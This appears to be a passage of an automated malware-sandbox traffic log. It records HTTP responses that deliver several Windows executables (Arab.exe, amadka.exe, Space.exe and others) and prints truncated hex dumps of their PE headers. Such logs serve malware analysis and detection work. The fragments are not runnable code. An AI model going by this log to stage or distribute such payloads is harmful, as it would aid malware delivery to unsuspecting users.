00 00 00 d0 00 00 50 09 00 00 00 10 01 00 00 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 44 92 00 00 00 Data Ascii: MZP@!L!This program must be run under Win32$7PEL^B*F$@@@P,CODED
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.22.0Date: Thu, 28 Mar 2024 08:14:58 GMTContent-Type: application/octet-streamContent-Length: 5713216Connection: keep-aliveContent-Description: File TransferContent-Disposition: attachment; filename=Arab.exeContent-Transfer-Encoding: binaryExpires: 0Cache-Control: must-revalidatePragma: publicData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 ae 62 fd 65 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 22 00 d4 10 00 00 80 03 00 00 00 00 00 28 64 8e 00 00 10 00 00 00 f0 10 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 50 99 00 00 04 00 00 ed 0d 58 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 24 19 8b 00 4a 00 00 00 8c 92 92 00 40 01 00 00 00 30 99 00 1b 11 00 00 00 00 00 00 00 00 00 00 00 b0 56 00 40 7d 00 00 00 10 99 00 54 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 ff 98 00 40 00 00 00 00 00 00 00 00 00 00 00 00 80 42 00 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 58 d2 10 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d8 3c 02 00 00 f0 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 c0 48 00 00 00 30 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 76 6d 70 c2 b3 c2 bb 44 fd 2e 00 00 80 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 76 6d 70 c2 b3 c2 bb 04 07 00 00 00 80 42 00 00 08 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 76 6d 70 c2 b3 c2 bb a0 74 56 00 00 90 42 00 00 76 56 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 65 6c 6f 63 00 00 54 1a 00 00 00 10 99 00 00 1c 00 00 00 82 56 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 1b 11 00 00 00 30 99 00 00 12 00 00 00 9e 56 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 28 Mar 2024 08:14:59 GMTContent-Type: application/octet-streamContent-Length: 1963008Connection: keep-aliveContent-Disposition: attachment; filename="amadka.exe"Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 04 64 a0 59 40 05 ce 0a 40 05 ce 0a 40 05 ce 0a 1b 6d cd 0b 51 05 ce 0a 1b 6d cb 0b e0 05 ce 0a 95 68 ca 0b 52 05 ce 0a 95 68 cd 0b 57 05 ce 0a 95 68 cb 0b 35 05 ce 0a 1b 6d ca 0b 55 05 ce 0a 1b 6d cf 0b 53 05 ce 0a 40 05 cf 0a 94 05 ce 0a db 6b c7 0b 41 05 ce 0a db 6b 31 0a 41 05 ce 0a db 6b cc 0b 41 05 ce 0a 52 69 63 68 40 05 ce 0a 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 6f 12 e4 65 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 06 05 00 00 b6 01 00 00 00 00 00 00 b0 4d 00 00 10 00 00 00 20 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 4d 00 00 04 00 00 be da 1e 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 56 a0 06 00 6a 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc 9b 4d 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 9b 4d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 ea 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 fa 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 fc 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 20 2c 00 00 b0 06 00 00 02 00 00 00 fe 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 69 6f 6d 69 6a 6f 75 65 00 d0 1a 00 00 d0 32 00 00 ce 1a 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 63 70 7a 75 64 70 77 70 00 10 00 00 00 a0 4d 00 00 04 00 00 00 ce 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 b0 4d 00 00 22 00 00 00 d2 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.24.0Date: Thu, 28 Mar 2024 08:15:00 GMTContent-Type: application/octet-streamConnection: closeContent-Description: File TransferContent-Disposition: attachment; filename=0e4bf4bb.exeContent-Transfer-Encoding: binaryExpires: 0Cache-Control: must-revalidatePragma: publicData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 6a 7e c8 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0c 00 00 e6 00 00 00 0e 6e 00 00 00 00 00 06 3c 00 00 00 10 00 00 00 00 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 10 6f 00 00 04 00 00 d2 03 05 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f4 60 01 00 50 00 00 00 00 20 6e 00 00 e6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 01 01 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 55 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 98 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 50 e5 00 00 00 10 00 00 00 e6 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 4c 6a 00 00 00 00 01 00 00 6c 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 0c a7 6c 00 00 70 01 00 00 40 02 00 00 56 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 00 e6 00 00 00 20 6e 00 00 e6 00 00 00 96 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.22.0Date: Thu, 28 Mar 2024 08:15:03 GMTContent-Type: application/octet-streamContent-Length: 5726528Connection: keep-aliveContent-Description: File TransferContent-Disposition: attachment; filename=Space.exeContent-Transfer-Encoding: binaryExpires: 0Cache-Control: must-revalidatePragma: publicData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 ae 62 fd 65 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 22 00 d4 10 00 00 80 03 00 00 00 00 00 e5 76 4c 00 00 10 00 00 00 f0 10 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 99 00 00 04 00 00 c5 fa 57 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 a0 f7 4b 00 4a 00 00 00 bc 7a 5d 00 40 01 00 00 00 90 99 00 1b 11 00 00 00 00 00 00 00 00 00 00 00 e4 56 00 40 7d 00 00 00 70 99 00 94 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 64 99 00 40 00 00 00 00 00 00 00 00 00 00 00 00 b0 42 00 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 58 d2 10 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d8 3c 02 00 00 f0 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 c0 48 00 00 00 30 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 76 6d 70 c2 b3 c2 bb cf 27 2f 00 00 80 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 76 6d 70 c2 b3 c2 bb 04 07 00 00 00 b0 42 00 00 08 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 76 6d 70 c2 b3 c2 bb 80 a9 56 00 00 c0 42 00 00 aa 56 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 65 6c 6f 63 00 00 94 1a 00 00 00 70 99 00 00 1c 00 00 00 b6 56 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 1b 11 00 00 00 90 99 00 00 12 00 00 00 d2 56 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 28 Mar 2024 08:15:27 GMTContent-Type: application/x-msdos-programContent-Length: 1106998Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 28 Mar 2024 08:15:34 GMTContent-Type: application/x-msdos-programContent-Length: 685392Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 28 Mar 2024 08:15:35 GMTContent-Type: application/x-msdos-programContent-Length: 608080Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
